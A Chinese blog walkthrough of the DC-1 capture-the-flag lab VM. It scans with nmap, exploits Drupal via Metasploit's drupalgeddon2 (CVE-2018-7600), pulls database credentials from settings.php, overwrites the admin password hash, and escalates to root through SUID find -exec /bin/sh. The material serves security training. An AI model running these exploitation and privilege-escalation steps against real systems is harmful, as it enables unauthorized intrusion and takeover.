靶场之DC-1

最新推荐文章于 2024-05-09 23:02:25 发布
最新推荐文章于 2024-05-09 23:02:25 发布
阅读量632 收藏 1
点赞数
分类专栏: 靶场 文章标签: linux python mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunxueer/article/details/119113109
版权

DC-1靶机

环境:

靶机名称:DC-1

攻击机:kali 192.168.78.135

1. 打开虚拟机

  • 选择打开,选择.ovf后缀
  • 开启虚拟机

image-20210726104918410

2. 信息收集

2.1 nmap扫描存活主机确定DC-1的ip地址
nmap -sP 192.168.78.0/24

image-20210726105117818

  • IP为192.168.78.129
2.2 利用namp扫描DC-1开放的端口
nmap -sV -A 192.168.78.129
-sV 探测服务的版本

image-20210726110027405

  • 发现22、80、111端口是开放的,并且可以看到版本信息
2.3 访问80端口

image-20210726110253817

  • Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成

  • 得到网站框架后,确定框架版本,在查找是否有此版本的漏洞

2.4 寻找Drupal版本信息(多种办法)
  1. 利用火狐的wappalyzer工具,版本为7.x

image-20210726111058914

  1. 利用nmap扫描的-sV参数,如上文得版本为7.x

  2. 利用目录扫描,首先查看一下robots.txt

    image-20210726111924348

    访问UPGRADE.txt
    image-20210726112022783

2.5 寻找此版本Drupal的漏洞
  • 利用msf 搜索漏洞
search durpal

image-20210726114853832

2.6 使用漏扫工具OpenVas

image-20210726140115981

  • 发现两个可以利用的漏洞

3. 漏洞利用(CVE-2018-7600)

use exploit/unix/webapp/drupal_drupalgeddon2
show options //查看参数信息

image-20210726115108159

设置IP
set RHOSTS 192.168.78.129

image-20210726140647027

exploit
//成功进入

image-20210726140729264

image-20210726140240516

3.1 寻找flag1
  • 利用成功后,先使用命令pwd,查看一下当前所在文件位置

image-20210726141317951

  • 列出所有文件
ls

image-20210726141351077

cat flag1.txt

image-20210726142230446

  • 提示需要去找drupal的配置文件
3.2 寻找flag2
  • 百度drupal默认配置文件的位置在 sites/default/settings.php
cd sites/default
cat settings.php

image-20210726143106847

  • 找到flag2

  • 此处提示不能使用暴力破解

3.3 寻找flag3
  • 根据上面的settings.php看到数据库信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yR4UHWlB-1627289234516)(DC-1.assets/image-20210726143431544.png)]

  • 有数据库登录的用户名和密码信息

  • 尝试连接数据库寻找apache登录界面的用户名和密码;由于连接mysql需要进入交互式shell,已知pyton版本

image-20210726144023962

shell
python -c  "import pty; pty.spawn('/bin/bash')" //或者
python3 -c  "import pty; pty.spawn('/bin/bash')"

image-20210726144142974

  • 成功进入
  • 连接数据库
mysql -udbuser -pR0ck3t

image-20210726144436412

  • 查看所有数据库
show databases;

image-20210726144738668

  • 查看所有表,找到users表
use drupaldb
show tables;

image-20210726144846054

  • 查看users表的字段,看到name和pass字段
desc users;

image-20210726145111472

  • 查询这两个字段
select name,pass from users;

image-20210726145215682

  • 得到用户名和密码

  • 不能使用暴力破解,尝试更新密码

    在使用update users set pass='123456' where name="admin",更新成功但是登录失败;看到原本是加密后的,尝试寻找Drupal对数据库的加密方法,更新密码为一个加密过后的已知密码;在drupal的官网上找到了druple的加密脚本位置./script/password-hash.sh,直接使用这个脚本进行加密。

cd /var/www/scripts
ls

image-20210726150800629

image-20210726150911361

php scripts/password-hash.sh 123456
//尝试多次命令,根据提示错误信息更正,最终得到123456的密文
$S$Daa/xJWcYSNNGN2NFyPCPAn5E8sWSdiPHtAh9BTdEBIPfmg1a.GB

image-20210726150933657

  • 重新进入数据库,更新admin的密码
update users set pass='$S$Daa/xJWcYSNNGN2NFyPCPAn5E8sWSdiPHtAh9BTdEBIPfmg1a.GB' where name = "admin";
  • 在浏览器登录页面输入用户名:admin,密码:123456;成功登录

image-20210726151635367
image-20210726151742280

  • 得到提示:Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow;
3.4 寻找flag4
  • 根据flag3的提示,shadow,尝试查看/etc/shadow
cat /etc/shadow
//提示权限不足

image-20210726152435616

  • 尝试查看一下 /etc/passwd
cat /etc/passwd

image-20210726152600853

  • 找到flag4用户,进入家目录看看有什么提示信息
cd /home/flag4
ls

image-20210726152756837

  • 查看一下flag4.txt
cat flag4.txt

image-20210726152917026

  • 提示在根目录下找访问标志
3.5 寻找flag5
  • 根据上面提示我们需要进入root用户的家目录寻找最后一个flag;那么如何提权至root用户?
  • 根据flag3的提示 find perm -exec,我们尝试使用find命令进行提权
find / -perm -4000
//找suid的程序

补充

suid:在默认情况下,用户发起一个进程,该进程的属主是发起者,而并非是文件的属主,此时进程是以发起者的身份去运行。如果给二进制程序文件添加了SUID权限后,用户发起一个进程,该进程的属主为程序文件所属的属主,而并非是发起者。

image-20210726155059162

  • 发现find命令有suid权限,进行其利用提权
find ./ aaa -exec '/bin/sh' \;

image-20210726162940707

  • 进入root的家目录
cd /root
ls
cat thefinalflag.txt

image-20210726163422193

补充:OpenVas中的CVE-2014-3704也可以做

  • 在msf模块中利用这个漏洞即可
SXE
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1166
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1渗透靶场实战速通版
saber的博客
12-01 888
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-1靶场
mlws1900的博客
03-21 1390
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
kali对CTF靶场进行渗透测试找flag
勤能补拙
05-09 1435
kali Linux做攻击机渗透测试CTF靶场找flag
DC-1靶机实战和分析
weixin_48202759的博客
08-31 931
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
DC靶场系列--DC1
BGiscool的博客
06-28 4856
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2230
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
VulnHub--DC-1--flag
记录笔记
04-08 310
配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 查看net模式下的网段 192.168.15.0 我们查看一下kali的IP地址 kali的IP192.168.15.142 Nmap -Sp 192.168.15.0/24扫描存活主机 我们就的到了DC-1的ip192.168.15.143 我们扫描一下看下开放的端口 目标靶机开放ssh远程连接服务,HTTP服务 whatweb http://192.168.15.143扫描网站指纹信息 或者使用火狐所带的
ChainFlag靶场实战(一)
m0_68764244的博客
01-02 682
靶场wpmore。
DC1靶场 Drupal
m0_62438849的博客
03-02 1143
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
CTF平台靶场 支持动态Flag以及Docker分发
微风飘呀飘
06-26 3479
一、功能: 用户登录、注册、找回密码(支持邮箱验证、手机短信验证[互亿无线接口]) 注册邀请码开放 可在后台增加注册邀请码 也可以关闭邀请码 支持动态Flag和静态Flag 格式为:动态Flag头{md5(用户Key+题目随机)} 动态分数和静态分数 动态分数根据解题人数而定 最高1000PT 最低10PT 先几血积分、银两加成开放 可在后台根据自己需要配置 平台运行方式:练习 (正常查看题目和提交FLAG)、竞赛(需在规定时间内查看题目和提交FLAG) 前台主要功能:公告、解题、排行、商城.
DC-1靶场初探
m0_52361291的博客
06-19 710
DC系列靶场环境,这是个模拟红队从信息收集到打点再到提权可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的。靶场下载环境:https ://download.vulnhub.com/dc/DC-1.zip下载完成后就是一个DC-1.ova文件双击用vm打开 就行了可以看到整个环境测试为黑盒测试(无登录账户和密码)首先,先对目标进行信息收集可以看到靶机开了22,80,111三个端口通过浏览器去访问靶机的网页可以看出是DrupalCM
DC-1靶场实操
m0_62709637的博客
01-07 492
DC-1靶场实操演练
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值